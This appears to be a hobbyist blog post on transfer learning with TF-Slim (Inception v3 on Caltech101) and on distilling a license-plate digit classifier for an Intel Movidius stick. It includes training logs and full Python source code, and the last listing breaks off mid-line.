Input: Caltech101
Output: 101 classes
Batch size: 32
Results
It worked.
Initializing from Pretrained Weights
INFO:tensorflow:Restoring parameters from ./models/inception_v3.ckpt
----------------------------------------------
EPOCH 1/20 100%|██████████| 216/216 [01:45<00:00, 2.41it/s]
100%|██████████| 54/54 [00:07<00:00, 8.15it/s]
step: 53 loss: 0.3671 val accuracy: 0.8681
----------------------------------------------
EPOCH 2/20 100%|██████████| 216/216 [01:29<00:00, 2.41it/s]
100%|██████████| 54/54 [00:06<00:00, 8.13it/s]
step: 53 loss: 0.2679 val accuracy: 0.9236
----------------------------------------------
EPOCH 19/20 100%|██████████| 216/216 [01:31<00:00, 2.34it/s]
100%|██████████| 54/54 [00:06<00:00, 7.97it/s]
step: 53 loss: 0.2040 val accuracy: 0.9659
----------------------------------------------
EPOCH 20/20 100%|██████████| 216/216 [01:31<00:00, 2.37it/s]
100%|██████████| 54/54 [00:06<00:00, 8.05it/s]
step: 53 loss: 0.2002 val accuracy: 0.9653
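The 216 training steps and 54 validation steps in the log come from integer division of each split by the batch size of 32, so the last partial batch is dropped. The sketch below reproduces that arithmetic. The total of 8,677 images is an assumption (the dataset size is never stated here), and `steps_for` is a hypothetical helper name; the 80/20 split is the one `loadimg` uses.

```python
import math


def steps_for(n_samples, batch_size):
    """Number of full batches; the final partial batch is skipped."""
    return n_samples // batch_size


n_total = 8677  # assumption: image count is not given in the text
batch_size = 32

# 80/20 split, with the test share rounded up.
n_test = math.ceil(n_total * 0.2)
n_train = n_total - n_test

train_steps = steps_for(n_train, batch_size)
val_steps = steps_for(n_test, batch_size)
print(train_steps, val_steps)
```

Under that assumption the step counts match the progress bars in the log, and a few images at the end of each split are never seen in an epoch.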
Source code
The code from the site, modified for the number-plate experiments
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim import tensorflow.contrib.slim.nets #from __future__ import print_function, division import loadimg from tqdm import tqdm import matplotlib.pyplot as plt start = time.time() # In[2]: np_aryname = './models/data{0}.npy' SAVE = False if SAVE: X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg( '/home/tokunn/caltech101') np.save(np_aryname.format('X_train'), X_train) np.save(np_aryname.format('Y_train'), Y_train) np.save(np_aryname.format('X_test'), X_test) np.save(np_aryname.format('Y_test'), Y_test) np.save(np_aryname.format('number_of_classes'), number_of_classes) else: # LOAD X_train = np.load(np_aryname.format('X_train')) Y_train = np.load(np_aryname.format('Y_train')) X_test = np.load(np_aryname.format('X_test')) Y_test = np.load(np_aryname.format('Y_test')) number_of_classes = np.load(np_aryname.format('number_of_classes')) print("X_train", X_train.shape) print("Y_train", Y_train.shape) print("X_test", X_test.shape) print("Y_test", Y_test.shape) print("Number of Classes", number_of_classes) # In[3]: SNAPSHOT_FILE = "./models/snapshot.ckpt" PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3 N_CHANNELS = 3 # Number of channels required by inception V3 N_CLASSES = number_of_classes # Change N_CLASSES to suit your needs # In[4]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") tf_Y = tf.placeholder(tf.int32, shape=[None], name="Y") tf_alpha = tf.placeholder_with_default(0.001, 
shape=None, name="alpha") tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training") # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") # BODY arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3( scaled_inputs, num_classes=N_CLASSES, is_training=tf_is_training, dropout_keep_prob=0.8) # PREDICTIONS tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds") # LOSS - Sums all losses (even Regularization losses) with tf.variable_scope('loss') as scope: unrolled_labels = tf.reshape(tf_Y, (-1,)) tf.losses.sparse_softmax_cross_entropy(labels=unrolled_labels, logits=tf_logits) tf_loss = tf.losses.get_total_loss() # OPTIMIZATION - Also updates batchnorm operations automatically with tf.variable_scope('opt') as scope: tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm with tf.control_dependencies(update_ops): tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op") # Evalution with tf.variable_scope('eval') as scope: y = tf.nn.softmax(tf_logits, name='softmax') accuracy = tf.reduce_mean( tf.cast(tf.equal(tf.argmax(y, 1), tf.cast(tf_Y, tf.int64)), tf.float32) ) # PRETRAINED SAVER SETTINGS # Lists of scopes of weights to include/exclude from pretrained snapshot pretrained_include = ["InceptionV3"] pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"] # PRETRAINED SAVER - For loading pretrained weights on the first run pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=pretrained_include, exclude=pretrained_exclude) tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver") # MAIN SAVER - For saving/restoring your complete model tf_saver = tf.train.Saver(name="saver") # TENSORBOARD - To visialize 
the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[5]: def initialize_vars(session): # INITIALIZE VARS if False: #tf.train.checkpoint_exists(SNAPSHOT_FILE): print(" Loading from Main Checkpoint") tf_saver.restore(session, SNAPSHOT_FILE) else: print("Initializing from Pretrained Weights") session.run(tf.global_variables_initializer()) tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE) # In[ ]: with tf.Session(graph=graph) as sess: n_epochs = 20 print_every = 32 batch_size = 32 # small batch size so inception v3 can be run on laptops steps_per_epoch = len(X_train)//batch_size steps_per_epoch_val = len(X_test)//batch_size initialize_vars(session=sess) for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') #print("----------------------------------------------", flush=True) for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: True} loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict) val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: False} val_accuracy.append(accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) print("\tstep: {: 4d} loss: {:0.4f} val accuracy: {:0.4f}".format( step, loss, 
total_val_accuracy)) plt.plot(sess.run(tf_logits, feed_dict = { tf_X: [X_test[0]], tf_Y: [Y_test[0]], tf_is_training: False })[0]) # SAVE SNAPSHOT - after each epoch tf_saver.save(sess, SNAPSHOT_FILE) # In[ ]: end = time.time() print("Time : {0}".format(end-start)) # In[ ]: plt.show()
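Running a model written with TensorFlow Slim (TF-Slim) on Movidius, plus a rough attempt at distillation
What is TF-Slim?
It is something like a set of macros over TensorFlow's low-level API. It makes models comparatively easy to write.
Defining variables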
weights = slim.model_variable('weights', shape=[10, 10, 3 , 3])
my_var = slim.variable('my_var', shape=[20, 1], initializer=tf.zeros_initializer())
Adding layers
net = slim.conv2d(input, 128, [3, 3], scope='conv1_1')
Layer | TF-Slim |
---|---|
BiasAdd | slim.bias_add |
BatchNorm | slim.batch_norm |
Conv2d | slim.conv2d |
Conv2dInPlane | slim.conv2d_in_plane |
Conv2dTranspose (Deconv) | slim.conv2d_transpose |
FullyConnected | slim.fully_connected |
AvgPool2D | slim.avg_pool2d |
Dropout | slim.dropout |
Flatten | slim.flatten |
MaxPool2D | slim.max_pool2d |
OneHotEncoding | slim.one_hot_encoding |
SeparableConv2D | slim.separable_conv2d |
UnitNorm | slim.unit_norm |
Sample
import numpy as np
import tensorflow as tf
from tensorflow.contrib.slim.nets import inception

slim = tf.contrib.slim

def run(name, image_size, num_classes):
    with tf.Graph().as_default():
        image = tf.placeholder("float", [1, image_size, image_size, 3], name="input")
        with slim.arg_scope(inception.inception_v1_arg_scope()):
            logits, _ = inception.inception_v1(image, num_classes, is_training=False, spatial_squeeze=False)
        probabilities = tf.nn.softmax(logits)
        init_fn = slim.assign_from_checkpoint_fn('inception_v1.ckpt', slim.get_model_variables('InceptionV1'))

        with tf.Session() as sess:
            init_fn(sess)
            saver = tf.train.Saver(tf.global_variables())
            saver.save(sess, "output/"+name)

run('inception-v1', 224, 1001)
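Distillation with TF-Slim
I stitched together source code I had found and forced it to run; it only barely works.
Using license-plate images, distill into a student made of fully connected layers only.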
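The student objective in the source listing further down is the sum of two cross-entropy terms: one against the true labels (`student_loss1`) and one against the teacher's softened output (`student_loss2`). The sketch below shows that sum for a single sample in plain Python, so it runs without TensorFlow. The function names and the example values are hypothetical; the clipping to `[1e-10, 1.0]` mirrors the `tf.clip_by_value` call in the listing.

```python
import math


def softmax(logits, temperature=1.0):
    """Softmax over logits divided by a temperature."""
    scaled = [z / temperature for z in logits]
    peak = max(scaled)  # subtract the max for numerical stability
    exps = [math.exp(z - peak) for z in scaled]
    total = sum(exps)
    return [e / total for e in exps]


def cross_entropy(target, prediction, eps=1e-10):
    """-sum(target * log(prediction)), with predictions clipped to [eps, 1]."""
    return -sum(t * math.log(min(max(p, eps), 1.0))
                for t, p in zip(target, prediction))


def distillation_loss(student_logits, teacher_probs, one_hot_label, temperature=1.0):
    """Hard-label term plus soft-target term, summed with equal weight."""
    hard = cross_entropy(one_hot_label, softmax(student_logits))
    soft = cross_entropy(teacher_probs, softmax(student_logits, temperature))
    return hard + soft


# Hypothetical 3-class example: an untrained student and a confident teacher.
loss_value = distillation_loss(
    student_logits=[0.0, 0.0, 0.0],
    teacher_probs=[0.8, 0.15, 0.05],
    one_hot_label=[1.0, 0.0, 0.0],
)
print(loss_value)
```

With the temperature left at 1, as in the listing, the soft term uses the same student distribution as the hard term; raising the temperature would flatten both the teacher and student outputs before they are compared.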
Converting the distilled model for Movidius
Check the output node in the graph
fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()
tensorboard --logdir logs
Compile
mvNCCompile -s 12 student_flozen.ckpt.meta -in=input -on=output -o graph
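The node names passed with `-in` and `-on` have to match the names given in the graph, here the `input` placeholder and the `output` softmax from the conversion script. A minimal sketch that assembles the same command line from those pieces, so the names can be changed in one place; `build_mvnccompile_cmd` is a hypothetical helper, and it only builds the argument list without running the tool. Reading `-s` as the number of SHAVE cores is my understanding of the flag rather than something stated here.

```python
import shlex


def build_mvnccompile_cmd(meta_file, input_node, output_node,
                          graph_out="graph", shaves=12):
    """Return the mvNCCompile argument list used in this post."""
    return [
        "mvNCCompile",
        "-s", str(shaves),
        meta_file,
        "-in=" + input_node,
        "-on=" + output_node,
        "-o", graph_out,
    ]


cmd = build_mvnccompile_cmd("student_flozen.ckpt.meta", "input", "output")
command_line = " ".join(shlex.quote(part) for part in cmd)
print(command_line)
```

The list form can be handed to `subprocess.run(cmd, check=True)` on a machine where the NCSDK is installed.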
Run
tokunn@nanase 1:18:01 [~/Documents/distil_mnist/second_challenge] $ python3 movidius.py /home/tokunn/make_image/test/3186 2>/dev/null
Image path : /home/tokunn/make_image/test/3186/*.jpg or *.png
['extend_5_0_5934.png', 'extend_9_0_1460.png', 'extend_9_0_6437.png', 'extend_9_0_733.png', 'extend_13_0_8860.png', 'extend_5_0_1296.png', 'extend_5_0_320.png', 'extend_5_0_2227.png', 'extend_5_0_6957.png', 'extend_1_0_2447.png']
imgshape (25, 784)
Start prediting ...
1 7 7 7 6 7 7 7 7 8 1 7 7 7 7 7 7 2 2 7 7 3 9 1 2
Time : 0.10333132743835449 (25 images)
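The reported time covers only the `LoadTensor` / `GetResult` loop, so it can be turned directly into a per-image latency and a throughput figure. A small worked example using the two numbers from the output above; the variable names are my own.

```python
elapsed_seconds = 0.10333132743835449  # "Time" from the run above
n_images = 25

ms_per_image = elapsed_seconds / n_images * 1000.0
images_per_second = n_images / elapsed_seconds

print("{:.2f} ms/image, {:.0f} images/s".format(ms_per_image, images_per_second))
```

That works out to roughly 4 ms per 28x28 image for the fully connected student, excluding image loading and preprocessing on the host.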
It ran more smoothly than I expected.
Source code
License plates: teacher and student
#!/usr/bin/env python # coding: utf-8 # In[1]: import os os.environ['TF_CPP_MIN_LOG_LEVEL']='2' os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim from tensorflow.examples.tutorials.mnist import input_data import loadimg # In[2]: #config = tf.ConfigProto() #config.gpu_options.per_process_gpu_memory_fraction = 0.25 #sess = tf.Session(config=config) config = tf.ConfigProto( gpu_options=tf.GPUOptions( visible_device_list="1", # specify GPU number allow_growth=False ) ) #sess = tf.Session(config=config) # In[3]: NUMBER_OF_CLASS = 10 # In[4]: def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False): with tf.variable_scope(scope,reuse = reuse) as sc : with slim.arg_scope([slim.conv2d], kernel_size = [3,3], stride = [1,1], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu): net = slim.conv2d(input, 32, scope='conv1') net = slim.max_pool2d(net,[2, 2], 2, scope='pool1') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 64,scope='conv2') net = slim.max_pool2d(net,[2, 2], 2, scope='pool2') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 128,scope='conv3') net = slim.max_pool2d(net,[2, 2], 2, scope='pool3') net = tf.nn.dropout(net, keep_prob_conv) net = slim.flatten(net) with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu) : net = slim.fully_connected(net,625,scope='fc1') net = tf.nn.dropout(net, keep_prob_hidden) net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2') net = tf.nn.softmax(net/temperature) return net # In[5]: def MnistNetworkStudent(input,scope='Mnist',reuse = False): with tf.variable_scope(scope,reuse = reuse) as sc : with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.sigmoid): net = 
slim.fully_connected(input,1000,scope = 'fc1') net = slim.fully_connected(net, NUMBER_OF_CLASS, activation_fn = None, scope = 'fc2') return net # In[6]: def loss(prediction,output,temperature = 1): cross_entropy = tf.reduce_mean(-tf.reduce_sum( output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)), reduction_indices=[1])) correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) return cross_entropy,accuracy # In[7]: eps = 0.1 alpha = 0.5 temperature = 1 start_lr = 1e-4 decay = 1e-6 # In[8]: with tf.Graph().as_default(): x = tf.placeholder(tf.float32, shape=[None, 784], name='input') y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS]) keep_prob_conv = tf.placeholder(tf.float32) keep_prob_hidden = tf.placeholder(tf.float32) x_image = tf.reshape(x, [-1,28,28,1]) y_conv_teacher=MnistNetworkTeacher(x_image,keep_prob_conv, keep_prob_hidden,scope = 'teacher') y_conv = MnistNetworkStudent(x,scope = 'student') y_conv_student = tf.nn.softmax(y_conv/temperature) y_conv_student_actual = tf.nn.softmax(y_conv) cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher, y_, temperature = temperature) student_loss1, accuracy_student = loss(y_conv_student_actual, y_, temperature = temperature) student_loss2 = tf.reduce_mean( - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)), reduction_indices=1) ) cross_entropy_student = student_loss1 + student_loss2 model_vars = tf.trainable_variables() var_teacher = [var for var in model_vars if 'teacher' in var.name] var_student = [var for var in model_vars if 'student' in var.name] grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher) grad_student = tf.gradients(cross_entropy_student,var_student) l_rate = tf.placeholder(shape=[],dtype = tf.float32) trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate) trainer1 = tf.train.GradientDescentOptimizer(0.1) train_step_teacher = 
trainer.apply_gradients(zip(grad_teacher,var_teacher)) train_step_student = trainer1.apply_gradients(zip(grad_student,var_student)) sess = tf.InteractiveSession(config=config) sess.run(tf.global_variables_initializer()) saver1 = tf.train.Saver(var_teacher) saver2 = tf.train.Saver(var_student) # In[9]: #mnist = input_data.read_data_sets("MNIST_data/", one_hot=True) x_train, y_train, x_test, y_test, class_count = loadimg.loadimg( '/home/tokunn/make_image/', NUMBER_OF_CLASS ) # In[10]: for i in range(10000): #batch = mnist.train.next_batch(128) s = 128*i % len(x_train) batch = [x_train[s:s+128], y_train[s:s+128]] lr = start_lr * 1.0/(1.0 + i*decay) if i%100 ==0: train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("step %d, training accuracy %g,"%(i, train_accuracy)) train_step_teacher.run(feed_dict={x: batch[0], y_: batch[1], keep_prob_conv :0.8, #keep_prob_hidden:0.5}) keep_prob_hidden:0.5, l_rate:lr}) saver1.save(sess,'./models/teacher1.ckpt') print('*'*20) for i in range(30000): #batch = mnist.train.next_batch(100) s = 128*i % len(x_train) batch = [x_train[s:s+100], y_train[s:s+100]] if i%100 == 0: train_accuracy = accuracy_student.eval(feed_dict={x:x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("step %d, training accuracy %g"%(i, train_accuracy)) train_step_student.run(feed_dict={x: batch[0], y_: batch[1], keep_prob_conv :1.0, keep_prob_hidden:1.0}) saver2.save(sess,'./models/student.ckpt') # In[11]: test_acc = sess.run(accuracy_student,feed_dict={x: x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("test accuracy of the student model is %g "%(test_acc)) # In[13]: fw = tf.summary.FileWriter('logs', sess.graph) fw.close() # In[ ]:
loadimg
#!/usr/bin/env python2 import os import numpy as np import tensorflow as tf from keras.preprocessing.image import load_img, img_to_array from keras.utils import np_utils import matplotlib.pyplot as plt import glob from sklearn.model_selection import train_test_split IMGSIZE = 28 IMGSIZE = 28 def loadimg_one(DIRPATH, NUM): x = [] y = [] img_list = os.listdir(DIRPATH) if (NUM) and (len(img_list) > NUM): img_list = img_list[:NUM] #print("[loadimg] : img_list : ", end=' ') #print(img_list) img_count = 0 for number in img_list: dirpath = os.path.join(DIRPATH, number) dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg')) dirpic_list += glob.glob(os.path.join(dirpath, '*.png')) for picture in dirpic_list: img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE))) x.append(img) y.append(img_count) #print("Load {0} : {1}".format(picture, img_count)) img_count += 1 output_count = img_count x = np.asarray(x) x = x.astype('float32') x = x/255.0 y = np.asarray(y, dtype=np.int32) y = np_utils.to_categorical(y, output_count) return x, y, output_count def loadimg(COMMONDIR='./', NUM=None): print("########## loadimg ########") #COMMONDIR = './make_image' TRAINDIR = os.path.join(COMMONDIR, 'train') TESTDIR = os.path.join(COMMONDIR, 'test') x_train, y_train, class_count = loadimg_one(TRAINDIR, NUM) x_test, y_test, _ = loadimg_one(TESTDIR, NUM) #for i in range(0, x_test.shape[0]): # plt.imshow(x_test[i]) # plt.show() x = np.concatenate((x_train, x_test)) x = np.reshape(x, [-1, 784]) y = np.concatenate((y_train, y_test)) print("x_train, y_train, x_test, y_test, class_count") print("x_train shape : ", x_train.shape) print("########## END of loadimg ########") x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.2, test_size=0.8) return x_train, y_train, x_test, y_test, class_count if __name__ == '__main__': loadimg()
Conversion code
#!/usr/bin/env python
# coding: utf-8

# In[1]:
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg

# In[2]:
NUMBER_OF_CLASS = 10

# In[3]:
def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.sigmoid):
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net, NUMBER_OF_CLASS, activation_fn = None, scope = 'fc2')
            return net

# In[4]:
eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6

# In[5]:
with tf.Graph().as_default():
    x = tf.placeholder(tf.float32, shape=[None, 784], name='input')
    x_image = tf.reshape(x, [-1,28,28,1])
    y_conv = MnistNetworkStudent(x,scope = 'student')
    y_conv_student = tf.nn.softmax(y_conv/temperature, name='output_temp')
    y_conv_student_actual = tf.nn.softmax(y_conv, name='output')
    model_vars = tf.trainable_variables()
    var_student = [var for var in model_vars if 'student' in var.name]
    sess = tf.InteractiveSession()
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())
    saver2 = tf.train.Saver(var_student)

# In[6]:
saver2.restore(sess, './models/student.ckpt')
saver2.save(sess,'./models/student_flozen.ckpt')

# In[7]:
fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()
Movidius prediction
import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os
import glob

IMAGE_DIR_NAME = '/home/tokunn/make_image/'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start prediting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()
    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])

    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.resize(image, (28, 28))
        img_list.append(image)
    # Scale to [0, 1] and flatten each 28x28 image to 784 values
    img_list = np.asarray(img_list) * (1.0/255.0)
    img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)

    predict(img_list.astype(np.float16))
Source code 2
Input is fed with shape [None, 28, 28, 3]
#!/usr/bin/env python
# coding: utf-8

# In[1]:
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg

# In[2]:
NUMBER_OF_CLASS = 10

# In[3]:
def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)
            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)
            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)
            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            net = slim.fully_connected(net,625,scope='fc1')
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2')
            net = tf.nn.softmax(net/temperature)
            return net

# In[4]:
def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.sigmoid):
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net, NUMBER_OF_CLASS, activation_fn = None, scope = 'fc2')
            return net

# In[5]:
def loss(prediction,output,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
        reduction_indices=[1]))
    correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy,accuracy

# In[6]:
eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6

# In[7]:
with tf.Graph().as_default():
    x = tf.placeholder(tf.float32, shape=[None, 28,28,1], name='input')
    y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS])
    keep_prob_conv = tf.placeholder(tf.float32)
    keep_prob_hidden = tf.placeholder(tf.float32)
    x_line = tf.reshape(x, [-1,784])
    y_conv_teacher=MnistNetworkTeacher(x,keep_prob_conv, keep_prob_hidden,scope = 'teacher')
    y_conv = MnistNetworkStudent(x_line,scope = 'student')
    y_conv_student = tf.nn.softmax(y_conv/temperature)
    y_conv_student_actual = tf.nn.softmax(y_conv)
    cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher, y_, temperature = temperature)
    student_loss1, accuracy_student = loss(y_conv_student_actual, y_, temperature = temperature)
    student_loss2 = tf.reduce_mean(
        - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)),
                        reduction_indices=1)
    )
    cross_entropy_student = student_loss1 + student_loss2
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'teacher' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]
    grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher)
    grad_student = tf.gradients(cross_entropy_student,var_student)
    l_rate = tf.placeholder(shape=[],dtype = tf.float32)
    trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate)
    trainer1 = tf.train.GradientDescentOptimizer(0.1)
    train_step_teacher = trainer.apply_gradients(zip(grad_teacher,var_teacher))
    train_step_student = trainer1.apply_gradients(zip(grad_student,var_student))
    sess = tf.InteractiveSession()
    sess.run(tf.global_variables_initializer())
    saver1 = tf.train.Saver(var_teacher)
    saver2 = tf.train.Saver(var_student)

# In[8]:
#mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
x_train, y_train, x_test, y_test, class_count = loadimg.loadimg(
    '/home/tokunn/make_image/', NUMBER_OF_CLASS
)

# In[9]:
for i in range(10000):
    #batch = mnist.train.next_batch(128)
    s = 128*i % len(x_train)
    batch = [x_train[s:s+128], y_train[s:s+128]]
    lr = start_lr * 1.0/(1.0 + i*decay)
    if i%100 ==0:
        train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test, y_: y_test,
                                                          keep_prob_conv: 1.0, keep_prob_hidden: 1.0})
        print("step %d, training accuracy %g,"%(i, train_accuracy))
    train_step_teacher.run(feed_dict={x: batch[0], y_: batch[1], keep_prob_conv :0.8,
                                      #keep_prob_hidden:0.5})
                                      keep_prob_hidden:0.5, l_rate:lr})
saver1.save(sess,'./models/teacher1.ckpt')
print('*'*20)
for i in range(30000):
    #batch = mnist.train.next_batch(100)
    s = 128*i % len(x_train)
    batch = [x_train[s:s+100], y_train[s:s+100]]
    if i%100 == 0:
        train_accuracy = accuracy_student.eval(feed_dict={x:x_test, y_: y_test,
                                                          keep_prob_conv: 1.0, keep_prob_hidden: 1.0})
        print("step %d, training accuracy %g"%(i, train_accuracy))
    train_step_student.run(feed_dict={x: batch[0], y_: batch[1],
                                      keep_prob_conv :1.0, keep_prob_hidden:1.0})
saver2.save(sess,'./models/student.ckpt')

# In[10]:
test_acc = sess.run(accuracy_student,feed_dict={x: x_test, y_: y_test,
